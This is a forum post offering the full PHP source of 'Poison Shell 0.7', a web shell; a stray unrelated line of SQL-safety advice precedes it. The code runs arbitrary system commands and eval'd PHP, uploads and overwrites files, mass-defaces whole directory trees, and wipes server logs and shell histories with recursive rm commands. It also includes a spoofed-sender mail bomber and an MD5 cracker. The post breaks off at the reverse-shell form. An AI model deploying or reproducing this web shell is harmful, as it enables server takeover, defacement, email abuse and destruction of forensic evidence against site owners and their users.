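The same two rules (validate identifiers, bind values) apply to mod(), eliminar() and the comment functions, whose where-clauses also interpolate $id and $categoria; is_numeric() on $id alone, as eliminar() does, still leaves the category unchecked.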
#328
Back-end / [PHP Shell] Poison Shell 0.7
July 03, 2011, 09:52:02 PM
Hello everyone, today I finished version 0.7 of my shell called poison shell
This shell has the following options

  • Information : about the web server

  • File and directory browsing :

    * In this option you can edit, delete, rename and download files
    * You can also create new directories

  • Run commands

  • Upload files to a specific directory

  • Base64 encode() decode()

  • Run php code with eval()

  • Load phpinfo()

  • Crack md5 hashes with or without salt

  • BackShell : in this version there is only a reverse shell in perl made by me

  • MassDefacement : mass deface of a directory and all the subdirectories under it

  • CleanLogs : cleans linux logs

  • FTP

    * Create new directories
    * This FTP client lets you browse through directories and files
    * Delete files
    * Change file permissions
    * Download files

  • SQL Manager

    * You can browse through the database, seeing all
    active databases and tables
    * Run SQL statements
    * Download tables
    * Download databases

  • Cookies Manager

    * In this option we can see all active cookies
    * We can create a cookie with the value we want

  • Session Manager

    * In this option we can see all active sessions
    * We can create a session with the value we want


  • Shell protected with user and pass

  • Self-destruction of the shell


    The code of the shell is the following


    Code: php

    <?php

    /*

    Poison Shell 0.7


    Doddy Hackman (C) Doddy Hackman


    Mail : lepuke[at]hotmail[com]
    Blog : doddy-hackman.blogspot.com

    */

    @session_start();

    $username = "a";
    $password = "a";

    if (isset($_POST['user'])) {
    if ($_POST['user'] == $username && $_POST['pass'] == $password) {
    $_SESSION['loginh'] = "1";
    }
    }

    if (isset($_GET['chaunow'])) {
    @session_destroy();
    }

    if ($_SESSION['loginh'] == 1) {

    if (isset($_GET['info'])) {
    die(phpinfo());
    }

    if (isset($_POST['sessionew'])) {
    @session_start();
    if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) {
    echo "<script>alert('Session created');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    }


    if(isset($_GET['bajardb'])) {

    $tod = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
    mysql_select_db($_GET['bajardb']);

    $resultado = mysql_query("SHOW TABLES FROM ".$_GET['bajardb']);

    while ($tabla = mysql_fetch_row($resultado)) {
    foreach($tabla as $indice => $valor) {

    $todo.= "<br><br>".$valor."<br><br>";

    $resultadox = mysql_query("SELECT * FROM ".$valor);

    $todo.="<table border=1>";

    for ($i=0;$i< mysql_num_fields($resultadox);$i++) {
    $todo.="<th>".mysql_field_name($resultadox,$i)."</th>";
    }
    while($dat = mysql_fetch_row($resultadox)) {
    $todo.="<tr>";
    foreach($dat as $val) {
    $todo.="<td >".$val."</td>";
    }
    }
    $todo.="</tr></table>";
    }
    }
    @mysql_free_result($tod);
    @header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
    @header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
    echo $todo; 
    exit(1);
    }




    if(isset($_GET['bajartabla'])) {
    $tod = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
    mysql_select_db($_GET['condb']);
    if(!empty($_GET['sentencia'])) {
    $resultado =  mysql_query($_GET['sentencia']);
    } else {
    $resultado = mysql_query("SELECT * FROM ".$_GET['bajartabla']);
    }
    $todo.="<table border=1>";
    for ($i=0;$i< mysql_num_fields($resultado);$i++) {
    $todo.="<th>".mysql_field_name($resultado,$i)."</th>";
    }
    while($dat = mysql_fetch_row($resultado)) {
    $todo.="<tr>";
    foreach($dat as $val) {
    $todo.="<td>".$val."</td>";
    }
    }
    @mysql_free_result($tod);
    $todo.="</tr></table>";
    @header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
    @header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
    echo $todo; 
    exit(1);
    }

    if (isset($_GET['reload'])) {
    $tipo = pathinfo($_GET['reload']);
    echo '<meta http-equiv="refresh" content="0;URL=?dir='.$tipo['dirname'].'>';
    exit(1);
    }

    function dame($file) {
    return substr(sprintf('%o', fileperms($file)), -4);
    }

    if (isset($_GET['down'])) {
    header("Content-Type: application/octet-stream");
    header("Content-Disposition: attachment; filename=".basename($_GET['down']));
    readfile($_GET['down']);
    }

    if (isset($_POST['cookienew'])) {
    if (setcookie($_POST['cookienew'],$_POST['valor'])) {
    echo "<script>alert('Cookie cREATED');</script>";
    echo '<meta http-equiv="refresh" content="0;URL=?cookiemanager">';
    } else {
    echo "<script>alert('Error');</script>";
    }
    }


    echo '<style type="text/css">


    .main {
    margin : -287px 0px 0px -490px;
    border : White solid 1px;
    BORDER-COLOR: #00FF00;
    }


    #pie {
    position: absolute;
    bottom: 0;
    }

    body,a:link {
    background-color: #000000;
    color:#00FF00;
    Courier New;
    cursor:crosshair;
    font-size: small;
    }

    input,table.outset,table.bord,table,textarea,select {
    font: normal 10px Verdana, Arial, Helvetica,
    sans-serif;
    background-color:black;color:#00FF00;
    border: solid 1px #00FF00;
    border-color:#00FF00
    }

    a:link,a:visited,a:active {
    color: #00FF00;
    font: normal 10px Verdana, Arial, Helvetica,
    sans-serif;
    text-decoration: none;
    }

    </style>';

    echo "<title>[+] PoisonShell (C) Doddy Hackman 2011 </title>";
    echo "<table><tr><td class=main><br><h2>&nbsp;&nbsp;&nbsp;PoisonShell&nbsp;&nbsp;&nbsp;</h2><br></td><td class=main>
    <b>System</b> : ".php_uname('s')." ".php_uname('r')." ".php_uname('v')."<br><b>Server</b> : ".$_SERVER['SERVER_SOFTWARE']."<br>";
    echo "<b>IP</b> : ".$_SERVER['SERVER_ADDR']."&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b>User</b> : uid=".getmyuid()." (".get_current_user().") gid=".getmygid()."&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b>Path</b> : ".getcwd()."&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b>Version PHP</b> : ".phpversion()."<br>";
    if (ini_get('safe_mode')==0) {
    echo "<b>Safe Mode</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    } else {
    echo "<b>Safe Mode</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    }
    if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
    echo "<b>Magic Quotes</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    } else {
    echo "<b>Magic Quotes</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    }
    exec("perl -h",$perl);
    if ($perl) {
    echo "<b>Perl</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    } else {
    echo "<b>Perl</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    }
    exec("wget --help",$wget);
    if ($wget) {
    echo "<b>WGET</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    } else {
    echo "<b>WGET</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    }
    exec("curl_version",$curl);
    if ($curl) {
    echo "<b>CURL</b> : ON&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    } else {
    echo "<b>CURL</b> : OFF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
    }

    echo "</tr></td></table><br>";

    echo "

    <table>
    <td class=main><a href=?dir=>Navigate</a></td><td class=main><a href=?cmd=>CMD</a></td>
    <td class=main><a href=?upload=>Upload</a></td><td class=main><a href=?base64=>Base64</a></td>
    <td class=main><a href=?phpconsole=>Eval</a></td><td class=main><a href=?info=>phpinfo</a></td>
    <td class=main><a href=?bomber=>Mailer</a></td><td class=main><a href=?md5crack=>MD5Crack</a></td>
    <td class=main><a href=?backshell>BackShell</a></td><td class=main><a href=?mass=>MassDefacement</a></td>
    <td class=main><a href=?logs=>CleanLogs</a></td><td class=main><a href=?ftp=>FTP</a></td>
    <td class=main><a href=?sql=>SQL</a></td><td class=main><a href=?cookiemanager=>Cookies</a></td>
    <td class=main><a href=?sessionmanager=>Session</a></td>
    <td class=main><a href=?chau=>Kill</a></td>
    </table><br><br>
    ";




    if(isset($_GET['perms'])) {
    echo "
    <form action='' method=POST>
    File : <input type=text name=archivo value=".$_GET['perms'].">
    <br>
    Perms : <input type=text name=perms value=".dame($_GET['perms'])."
    <br><br>
    <input type=submit name=cambiarperms value=Change>
    </form>
    ";
    }
    if (isset($_POST['cambiarperms'])) {
    if (chmod($_POST['archivo'],$_POST['perms'])) {
    echo "<script>alert('cHANGED');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
    }

    if (isset($_GET['ren'])) {
    echo "
    <form action='' method=POST>
    File : <input type=text name=nombre value=".$_GET['ren']."><br>
    Change to : <input type=text name=cambio><br><BR>
    <input type=submit name=cambios value=Change><BR>
    </form>
    ";
    }

    if (isset($_POST['cambios'])) {
    if (@rename($_POST['nombre'],$_POST['cambio'])) {
    echo "<script>alert('Changed');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_POST['cambios'].">Atras</a><br><br></font></center>";
    }



    if (isset($_POST['crear1'])) {
    chdir($_POST['dir']);
    if (fopen($_POST['crear1'],"w")) {
    echo "<script>alert('File cREATED');</script>";
    }else {
    echo "<script>alert('Error');</script>";
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
    }

    if (isset($_POST['crear2'])) {
    chdir($_POST['dir']);
    if (@mkdir($_POST['crear2'],777)) {
    echo "<script>alert('Directory created');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
    }


    if (isset($_GET['del'])) {
    $tipo  = filetype($_GET['del']);
    if ($tipo == "dir") {
    if (rmdir($_GET['del'])) {
    echo "<script>alert('Directory Deleted');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    } else {
    if (unlink($_GET['del'])) {
    echo "<script>alert('File Deleted');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_GET['del'].">Atras</a><br><br></font></center>";
    }

    if (isset($_GET ['copiar'])) {
    echo '
    <form action="" method=POST>
    File : <input type=text name=archivo value='.$_GET['copiar'].'><br>
    Copy to : <input type=text name=nuevo><br><br>
    <input type=submit name=copiado value=Copy><BR>
    </form>
    ';
    }

    if (isset($_POST['copiado'])) {
    if (copy($_POST['archivo'],$_POST['nuevo'])) {
    echo "<script>alert('OK');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
    }

    if (isset($_GET['open'])) {
    echo "<form action='' method=POST>";
    echo "<center>";
    echo "<textarea cols=80 rows=40 name=code>";
    $archivo = file($_GET['open']);
    foreach($archivo as $n=>$sub) {
    $texto = htmlspecialchars($sub);
    echo $texto;
    }
    echo "</center></textarea>";
    echo "<br><br><center><input type=submit value=Save name=modificar></center><br><br>";
    echo "</form>";
    }

    if (isset($_POST['modificar'])) {
    $modi = fopen($_GET['open'],'w+');
    if ($yeah = fwrite($modi,$_POST['code'])) {
    echo "<script>alert('OK');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }
    echo "<br><br><font color=red><center><a href=?reload=".$_GET['open'].">Atras</a><br><br></font></center>";
    }


    if (isset($_GET['dir'])) {
    if ($_GET['dir']=="") {
    $path = getcwd();
    chdir($path);
    $dir = dir($path);
    } else {
    $path = $_GET['dir'];
    chdir($path);
    $dir = dir($path);
    }
    echo "
    <br><br>
    <form action='' method=GET>
    <b>Directory</b> : <input type=text name=dir value=".$path."><input type=submit name=ir value=Navegar>
    </form>
    <br><br>
    <form action='' method=POST>
    <b>New File</b> : <input type=text name=crear1><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
    </form>
    <form action='' method=POST>
    <b>New Directory</b> : <input type=text name=crear2><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
    </form><br><br>
    ";
    $archivos = array('dir'=>array(),'file'=>array());
    while ($archivo = $dir->read()) {
    $ver = @filetype($path.'/'.$archivo) ;
    if ($ver=="dir") {
    $archivos['dir'][] = $path.'/'.$archivo;
    } else {
    $archivos['file'][] = $path.'/'.$archivo;
    }
    }
    $dir->rewind();
    echo "<br><b>Directory Found</b> : ".count($archivos['dir'])."<br>";
    echo "<b>Files Found</b> : ".count($archivos['file'])."<br><br><br>";
    echo "<table bgcolor=#00FF00 border=1>";
    echo "<tr>";
    foreach ($archivos['dir'] as $dirs) {
    $dirsx = pathinfo($dirs);
    echo "<td width=100><a href=?dir=".$dirs.">".$dirsx['basename']."</a></td>";
    echo "<td width=100><a href=?ren=".$dirs.">Move</a></td>";
    echo "<td width=100><a href=?del=".$dirs.">Delete</a></td>";
    echo "<td width=100><a href=?perms=".$dirs.">Perms</a></td>";
    echo "<td width=100>--</td>";
    echo "<td width=100>--</td>";
    echo "</tr><tr>";
    }
    foreach ($archivos['file'] as $files) {
    $filex = pathinfo($files);
    echo "<td width=100><a href=?open=".$files.">".$filex['basename']."</a></td>";
    echo "<td width=100><a href=?ren=".$files.">Move</a></td>";
    echo "<td width=100><a href=?del=".$files.">Delete</a></td>";
    echo "<td width=100><a href=?perms=".$files.">Perms</a></td>";
    echo "<td width=100><a href=?copiar=".$files.">Copy</a></td>";
    echo "<td width=100><a href=?down=".$files.">Download</a></td>";
    echo "</tr><tr>";
    }
    echo "</table>";
    }


    if (isset($_GET['cmd'])) {
    echo '
    <form action="" method=POST>
    Command : <input type=text name=comando size=50><input type=submit name=ejecutar value=Now>
    </form>
    ';
    }
    if (isset($_POST['ejecutar'])) {
    echo '
    <br><br>Command<br><br>
    <fieldset>
    '.$_POST['comando'].'</fieldset>
    <br><br>Result<br><br><fieldset>';
    if (!system($_POST['comando'])) {
    echo "<script>alert('Error loading command');</script>";
    echo "Error";
    }
    echo "</fieldset><br><br>";
    }

    if (isset($_GET['upload'])) {
    echo "<center><h2>Upload files</h2></center><center><br><br><br>";
    echo '
    <form enctype="multipart/form-data" action="" method=POST>
    File : <input type=file name=archivo><br><br>
    Directory : <input type=text name=destino value='.getcwd().'>
    <input type=submit value=Upload><br>
    </form>';
    if (isset($_FILES['archivo'])) {
    $subimos = basename($_FILES['archivo']['name']);
    if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subimos)) {
    if (copy($subimos,$_POST['destino']."/".$subimos)) {
    unlink($subimos);
    echo "<script>alert('File uploaded');</script>";
    }
    } else {
    echo "<script>alert('Error');</script>";
    }
    }
    }

    if (isset($_GET['base64'])) {
    echo '
    <form action="" method=POST>
    Encode : <input type=text name=code size=50><input type=submit name=codificar value=Encode>
    </form>
    <form action="" method=POST>
    Decode : <input type=text name=decode size=50><input type=submit name=decodificar value=Decode>
    </form>
    ';
    }
    if (isset($_POST['codificar'])) {
    echo "<br><br>Text<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Result<br><br><fieldset>";
    echo base64_encode($_POST['code']) ;
    echo "</fieldset><br><br>";
    }

    if (isset($_POST['decodificar'])) {
    echo "<br><br>Text<br><br><fieldset>".$_POST['decode']."</fieldset><br><br>Result<br><br><fieldset>";
    echo base64_decode($_POST['decode']);
    echo "</fieldset><br><br>";
    }


    if (isset($_GET['phpconsole'])) {
    echo '
    <form action="" method=POST>
    Code : <input type=text name=codigo size="70"><input type=submit name=cargar value=OK>
    </form>
    ';
    }
    if (isset($_POST['cargar'])) {
    echo "<br><br>Code<br><br>
    <fieldset>
    ".$_POST['codigo']."
    </fieldset>
    <br><br>
    Result<br><br>
    <fieldset>";

    eval($_POST['codigo']);
    echo "</fieldset>
    ";
    }




    if (isset($_GET['logs'])) {
    echo '
    <br><br><center><h3>Zapper</h3>
    <br><br>
    <form action="" method=GET>
    <input type=submit name=clean value=Start>
    </form></center>
    <br><br>
    ';
    }

    if (isset($_GET['clean'])) {

    $paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
    "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
    "/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
    "/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
    "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

    $comandos  = array('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST');

    foreach($paths as $path) {
    if(@unlink($path)) {
    echo $path.": Deleted<br>";
    }
    }
    echo "<br><br>";
    foreach($comandos as $comando) {
    echo "Loading command : ".$comando."<br>";
    system($comando);
    }
    }


    if(isset($_GET['mass'])) {
    echo "
    <form action='' method=POST>
    Directory to start : <input type=text name=dir value=".getcwd()."><br><br>
    Code : <input type=text name=codigo size=70>
    <input type=submit name=def value=Start>
    </form>
    ";
    }
    if (isset($_POST['def'])) {
    juntar($_POST['dir'],$_POST['codigo']);
    }
    function juntar ($dira,$text) {
    $dir= opendir($dira);
    while (!is_bool($archivos = readdir($dir))) {
    if ($archivos != "..") {
    if ($archivos != ".")  {
    if ($archivos != basename($_SERVER['PHP_SELF'])) {
    if (@filetype($dira."/".$archivos) == dir) {
    juntar($dira."/".$archivos,$text);
    } else {
    echo "Deface : ".$dira."/".$archivos."<br>";
    $solo = fopen($dira."\\".$archivos,"w");
    $solo = fwrite($solo,$text);
    fclose($solo);
    }}}}}}


    if (isset($_GET['chau'])) {
    if ($_GET['chau'] == "fuckit") {
    echo "<br><br><h3>Kapoom !!!</h3><br><br>";
    //unlink(basename($_SERVER['PHP_SELF']));
    } else {
    echo "<br><br><font color=red><h3><center>Acceso Denegado</center></h3></font><br><br>";
    }
    }



    if (isset($_GET['bomber'])) {
    echo "
    <form action='' method=POST>
    Target : <input type=text name=idiot [email protected]><br>
    Fake mail : <input type=text name=falso><br>
    Fake name : <input type=text name=nombrefalso><br>
    Subject : <input type=text name=asunto><br>
    Count : <input type=text name=count value=1><br>
    Message : <input type=text name=mensaje size=60><br><br>
    <br><input type=submit name=bombers value=Now>
    </form>";
    }

    if (isset($_POST['bombers'])) {

    $need .="MIME-Version: 1.0\n";
    $need .="Content-type: text/html ; charset=iso-8859-1\n";
    $need .="MIME-Version: 1.0\n";
    $need .="From: ".$_POST['nombrefalso']." <".$_POST['falso'].">\n";
    $need .="To: ".$_POST['nombrefalso']."<".$_POST['falso'].">\n";
    $need .="Reply-To:".$_POST['falso']."\n";
    $need .="X-Priority: 1\n";
    $need .="X-MSMail-Priority:Hight\n";
    $need .="X-Mailer:Widgets.com Server";


    echo "<br><br><br><center><h2>Result</h2></center><br><br>";

    for ($i = 1; $i <= $_POST['count']; $i++) {
    if(@mail($_POST['idiot'],$_POST['asunto'],$_POST['mensaje'],$need)) {
    echo "[+] Message <b>$i</b> Send<br>";
    flush();
    } else {
    echo "[+] Message <b>$i</b> not Send<br>";
    }}}

    if (isset($_GET['md5crack'])) {

    echo "

    <form action='' method=POST
    <b>Hash</b> : <input type=text name=md5 size=50><br><br>
    <b>Salt</b> : <input type=text name=salto size=50><br>
    <br><h3>Wordlist</h3>
    <textarea cols=80 rows=40 name=code></textarea>
    <br><br>
    <input type=submit value=Crack>
    </form>
    ";

    }

    if (isset($_POST['md5'])) {
    echo "<br><br><fieldset>";
    echo "[+] Starting the search<br><br>";

    $total = explode("\n",$_POST['code']);

    foreach ($total as $linea){

    $linea = chop($linea);

    if (!empty($_POST['salto'])) {
    $test = md5($linea.$_POST['salto']);
    } else {
    $test = md5($linea);
    }

    if ($test == $_POST['md5']) {
    echo "<br>[+] Hash Cracked : ".$_POST['md5'].":".$linea."<br><br>";
    exit(1);
    } else {
    echo "[+] : ".$_POST['md5']." != ".$linea."<br>";
    }
    }
    echo "<br>[+] Finished<br>";
    echo "</fieldset>";
    }

    if (isset($_GET['cookiemanager'])) {
    echo "<h2>Cookies</h2><br><br>";
    echo "[+] <b>Cookies Found</b> : ".count($_COOKIE)."<br><br>"; 

    echo "
    <br><BR><form action='' method=POST>
    New cookie : <input type=text name=cookienew><BR>
    Value : <input type=text name=valor><BR><br>
    <input type=submit value=Create><BR><br><br>
    </form><br>";


    echo "<table>";
    echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

    if (count($_COOKIE) != 0) {
    foreach  ($_COOKIE as $nombre=>$valor) {
    echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
    }
    echo "</table>";
    }

    echo "<br><br>";
    }

    if (isset($_GET['sessionmanager'])) {

    @session_start();

    echo "<h2>Session</h2><br><br>";
    echo "[+] <b>Sessions Found</b> : ".count($_SESSION)."<br><br>"; 


    echo "
    <br><BR><form action='' method=POST>
    New session : <input type=text name=sessionew><BR>
    Value : <input type=text name=valor><BR><br>
    <input type=submit value=Create><BR><br><br>
    </form><br>";


    if (count($_SESSION) != 0) {

    echo "<table>";
    echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

    foreach  ($_SESSION as $nombre=>$valor) {
    echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
    }
    echo "</table>";
    }
    }

    if (isset($_GET['ftp'])) {
    echo "<h2>FTP Manager</h2><br><br>";
    echo "

    <form action='' method=GET>
    Server : <input type=text name=serverftp value=127.0.0.1><br>
    User : <input type=text name=user value=doddy><br>
    Pass : <input type=text name=pass value=123><br><br><br>
    <input type=hidden name=diar value=/>
    <input type=submit value=Connect><br><br>
    </form>
    ";

    }

    if (isset($_GET['renamenow'])) {

    echo "

    <form action='' method=GET>
    File : <input type=text name=renamenowx value=".$_GET['renamenow']."><br>
    New name : <input type=text name=newname><br><br>
    <input type=hidden name=serverftp value=".$_GET['serverftp'].">
    <input type=hidden name=user value=".$_GET['user'].">
    <input type=hidden name=pass value=".$_GET['pass'].">
    <input type=hidden name=diar value=".$_GET['diar'].">
    <input type=submit value=Rename>
    </form>
    ";
    exit(1);
    }


    if (isset($_GET['renamenowx'])) {

    $enter = ftp_connect($_GET['serverftp']);
    $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

    if (ftp_rename($enter,$_GET['renamenowx'],$_GET['newname'])) {
    echo "<script>alert('Changed');</script>";
    echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
    } else {
    echo "<script>alert('Error');</script>";
    }
    }



    if (isset($_GET['deletenow'])) {

    $enter = ftp_connect($_GET['serverftp']);
    $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

    if ($_GET['controla'] == "dir") {
    if (@ftp_rmdir($enter,$_GET['deletenow'])) {
    echo "<script>alert('Directory Deleted');</script>";
    echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
    } else {
    echo "<script>alert('Error');</script>";
    }

    } else {

    if (@ftp_delete($enter, $_GET['deletenow'])) {
    echo "<script>alert('File Deleted');</script>";
    echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
    } else {
    echo "<script>alert('Error');</script>";
    }

    }
    }


    if (isset($_GET['permsdown'])) {

    echo "<form action='' method=GET>
    File : <input type=text name=filetochange value=".$_GET['permsdown'].">
    Perms : <input type=text name=pe value=0777 >
    <input type=hidden name=serverftp value=".$_GET['serverftp'].">
    <input type=hidden name=user value=".$_GET['user'].">
    <input type=hidden name=pass value=".$_GET['pass'].">
    <input type=submit value=Change>
    </form>";
    exit(1);
    }

    if (isset($_GET['filetochange'])) {

    $enter = ftp_connect($_GET['serverftp']);
    $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

    if (@ftp_chmod($enter,$_GET['pe'],$_GET['filetochange'])) {
    echo "<script>alert('Changed');</script>";
    } else {
    echo "<script>alert('Error');</script>";
    }

    }


    if (isset($_GET['serverftp'])) {

    if ($enter = @ftp_connect("127.0.0.1")) {
    if ($dentro = @ftp_login($enter,"doddy","123")) {
    echo "<br><b>[+] Connected to server</b><br>";
    } else {
    echo "<br><b>[-] Error in the login</b><br><br>";
    }

    echo "<b>[+] ONline</b><br><br><br>";

    echo "

    <form action='' method=GET>
    Directory : <input type=text name=diar value=";
    if (empty($_GET['diar'])) {
    echo ftp_pwd($enter);
    } else {
    echo $_GET['diar'];
    }

    echo ">
    <input type=hidden name=serverftp value=".$_GET['serverftp'].">
    <input type=hidden name=user value=".$_GET['user'].">
    <input type=hidden name=pass value=".$_GET['pass'].">

    <input type=submit value=Load>
    </form>
    <br><br>
    <form action='' method=GET>
    New directory : <input type=text name=newdirftp><input type=submit value=Load>
    <input type=hidden name=serverftp value=".$_GET['serverftp'].">
    <input type=hidden name=user value=".$_GET['user'].">
    <input type=hidden name=pass value=".$_GET['pass'].">
    <input type=hidden name=diar value=".$_GET['diar'].">
    </form>
    <br><br>

    <br><br>";

    if (isset($_GET['diar'])) {

    $enter = ftp_connect($_GET['serverftp']);
    $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

    if (empty($_GET['diar'])) {

    if (!$lista = ftp_nlist($enter.".")) {
    echo "<script>alert('Error loading directory');</script>";
    exit(1);
    }

    } else {

    if (!$lista = ftp_nlist($enter,$_GET['diar'])) {
    echo "<script>alert('Error loading directory');</script>";
    exit(1);
    }

    }
    }

    echo "<table>";
    foreach ($lista as $ver) {
    echo "<td class=main>".$ver."</td>";

    if (ftp_size($enter,ftp_pwd($enter).$ver) == -1) {

    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">Enter</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=dir&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
    echo "<td class=main>--</a></td><tr>";

    } else {

    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">--</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=file&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
    echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&downfile=".$ver.">Download</a></td><tr>";

    }

    }

    echo "</table>";

    } else {
    echo "<b>[-] Error in the server</b><br><br>";
    }
    }


    if (isset($_GET['downfile'])) {

    $enter = ftp_connect($_GET['serverftp']);
    $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

    $nuevo = fopen(basename($_GET['downfile']),'w');

    if (ftp_fget($enter,$nuevo,$_GET['downfile'], FTP_ASCII, 0)) {
    echo "<script>alert('File Download');</script>";
    echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
    } else {
    echo "<script>alert('Error in the download');</script>";
    }

    ftp_close($enter);
    fclose($nuevo);

    }

    if (isset($_GET['newdirftp'])) {

    $enter = ftp_connect($_GET['serverftp']);
    $dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

    if (ftp_mkdir($enter,$_GET['diar'].$_GET['newdirftp'])) {
    echo "<script>alert('Directory created');</script>";
    echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
    } else {
    echo "<script>alert('Error');</script>";
    }
    }

    if (isset($_GET['backshell'])) {

    echo "

    <form action='' method=GET>
    IP : <input type=text name=ip value=".$_SERVER['REMOTE_ADDR']."><br>
